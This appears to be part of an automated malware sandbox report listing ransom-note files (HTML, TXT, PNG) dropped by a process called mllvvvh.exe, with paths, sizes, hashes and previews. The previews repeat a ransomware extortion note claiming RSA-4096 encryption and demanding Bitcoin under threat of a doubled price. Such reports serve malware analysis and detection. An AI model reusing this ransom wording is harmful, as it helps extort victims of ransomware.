                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
